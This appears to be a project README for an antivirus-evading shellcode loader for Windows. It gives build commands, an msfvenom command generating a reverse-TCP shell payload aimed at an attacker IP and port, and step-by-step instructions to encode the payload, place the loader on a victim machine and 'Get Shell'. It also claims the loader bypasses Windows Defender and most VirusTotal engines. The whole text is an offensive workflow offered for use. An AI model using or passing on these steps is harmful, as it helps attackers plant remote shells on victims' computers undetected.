A meow meow shellcode based, anti-antivirus shell-code loader.
Tested on gcc version 6.3.0 (MinGW.org GCC-6.3.0-1)
, Microsoft Windows [版本 10.0.19044.1288]
- Converter
gcc converter.c -o converter.exe
- Loader
gcc main.c -O3 -s -o meow_loader.exe
- Put the shellcode (without
\x
,0x
... ) insrc.txt
- e.g. :
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.40.129 LPORT=9453 -f c | grep -v unsigned|sed "s/\"\\\x//g"|sed "s/\\\x//g"|sed "s/\"//g"|sed ':a;N;$!ba;s/\n//g'|sed "s/;//g"
- e.g. :
- Run the
converter.exe > meow.meow
on the attacker machine- It will appear a
meow.meow
file contain encoded shell code
- It will appear a
- Put the
meow_loader.exe
andmeow.meow
file into the victim machine in same folder - Run the
meow_loader.exe
on the victim. - Get Shell!!
- Bypass Windows Defender on 2022/2/28
- VirusTotal (7/70) on 2022/2/28